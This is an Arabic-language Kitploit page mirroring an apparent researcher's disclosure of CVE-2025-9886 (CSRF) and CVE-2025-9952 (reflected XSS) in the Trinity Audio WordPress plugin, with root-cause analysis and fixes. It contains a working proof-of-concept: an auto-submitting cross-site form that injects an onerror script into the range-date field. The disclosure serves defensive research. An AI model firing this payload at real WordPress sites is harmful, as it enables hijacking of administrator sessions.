Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Trinity-Audio-CVE-Report2 — إفصاح عن CVE-2025-9886 و CVE-2025-9952 | Kitploit
أدوات/GitHubGitHub/mooseloveti/trinity-audio-cve-report2
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقالتعلم والتعليم
GitHubmooseloveti/trinity-audio-cve-report2

Trinity-Audio-CVE-Report2

إفصاح عن CVE-2025-9886 و CVE-2025-9952

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 8 أشهرلم تتم المراجعة بعد

Trinity-Audio-CVE-Report 2

Disclosure for CVE-2025-9886 and CVE-2025-9952.

CVE-2025-9886 و CVE-2025-9952 - ثغرة في Trinity Audio

يكشف هذا المستودع عن ثغرة تم اكتشافها في Trinity Audio <= 5.20.1،إضافة ووردبريس تم تطويرها بواسطة sergiotrinity.

🛠 الإصدار المتأثر

  • المنتج: Trinity Audio
  • الإصدار: v5.20.1
  • الرابط: https://wordpress.org/plugins/trinity-audio/

🔒 CVE المخصصة

CVE IDالنوعالمكونالتأثير
CVE-2025-9886تزوير الطلب عبر المواقعadmin/inc/post-management.phpتمكين/تعطيل شامل لـ Trinity Audio على المنشورات ضمن جلسة الضحية
CVE-2025-9952البرمجة النصية عبر المواقع المنعكسةadmin/inc/post-management.phpتنفيذ نصوص عشوائية

🧾 وصف تفصيلي

CVE-2025-9886 — تزوير الطلب عبر المواقع

  • المكون المتأثر: معالج صفحة إدارة المنشورات (admin/inc/post-management.php)

  • ناقل الهجوم: طلب POST من أصل مختلف إلى wp-admin/admin.php?page=trinity_audio_post_management

  • المحفز: مسؤول موثوق يزور صفحة يتحكم بها المهاجم تقدم تلقائياً نموذجاً معداً

  • التأثير: يجبر المهاجم تغييرات حالة شاملة (تمكين/تعطيل Trinity Audio على جميع المنشورات أو نطاق تاريخي) باستخدام صلاحيات المسؤول، مما يضر بالتكامل وربما التوفر

CVE-2025-9952 — البرمجة النصية عبر المواقع المنعكسة

  • المكون المتأثر: معالج صفحة إدارة المنشورات (admin/inc/post-management.php)

  • ناقل الهجوم: طلب POST من أصل مختلف إلى wp-admin/admin.php?page=trinity_audio_post_management مع post-management-action=activate-all-posts-range و range-before-after=after وتاريخ صالح متبوع بـ HTML.

  • المحفز: مسؤول موثوق يزور صفحة يتحكم بها المهاجم تقدم تلقائياً النموذج المعد. يجب أن يكون هناك على الأقل منشور واحد منشور بعد التاريخ المقدم.

  • التأثير: يتم تنفيذ جافا سكريبت عشوائي في أصل المسؤول، مما يمكن من سرقة الجلسة أو التلاعب بالإعدادات أو تسلسل هجمات CSRF.

PoC

 من خلال الجمع بين هاتين الثغرتين، يمكن للمهاجم تنفيذ نصوص عشوائية عن طريق توجيه المستخدمين إلى موقع يحتوي على النموذج التالي.

  1. المسؤول مسجل الدخول إلى الموقع المستهدف.
  2. يستضيف المهاجم HTML التالي:
root@kitploit:~
<form method="POST" action="https://victim.example.com/wp-admin/admin.php?page=trinity_audio_post_management">
  <input type="hidden" name="action" value="1">
  <input type="hidden" name="post-management-action" value="activate-all-posts-range">
  <input type="hidden" name="range-before-after" value="after">
  <input type="hidden" name="range-date" value="2025-09-03&lt;img src=x onerror=alert(document.domain)&gt;">
</form>
<script>document.forms[0].submit();</script>

❓سبب الثغرة

  • CSRF (CVE-2025-9886): نقطة النهاية التي تغير الحالة تقبل الطلبات عبر المواقع دون دفاعات CSRF. لا يوجد التحقق من nonce (check_admin_referer/wp_verify_nonce) ولا التحقق من Origin/Referer. نظراً لأن ملفات تعريف الارتباط تُرسل تلقائياً، يمكن للمهاجم التسبب في تنفيذ إجراءات ضمن جلسة مستخدم موثوق.

  • Reflected XSS (CVE-2025-9952): معالج إدارة المنشورات (admin/inc/post-management.php) يقوم بإدراج قيمة POST الخاصة بـ range-date في إشعار النجاح دون ترميز الإخراج (لا يوجد esc_html()/wp_kses())، مما يسمح بحقن HTML/JS.

الإصلاح المقترح:

  • طلب رمز CSRF صالح على جميع الطلبات التي تغير الحالة: إضافة wp_nonce_field(...) إلى النماذج والتحقق باستخدام check_admin_referer(...) أو wp_verify_nonce(...).
  • يجب ترميز معامل range-date بشكل صحيح قبل عرضه.

تعليق

على الرغم من أنها تبدو مجرد CSRF و SelfXSS، إلا أنه من خلال الجمع بينهما، إذا نجح CSRF، يمكن تنفيذ أي كود JS. كان من الممتع إنشاء PoC مثير للاهتمام كهذا.

🔍 المكتشف

الاسم: MooseLove
الدور: باحث أمني مستقل / صائد ثغرات
جهة الاتصال: متاح عند الطلب


📚 المراجع

  • المنتج: https://wordpress.org/plugins/trinity-audio/

⚠️ الترخيص

يتم تقديم هذا التنبيه للتوعية الأمنية العامة. مجاني للمشاركة مع الإسناد.

تنزيل الأداة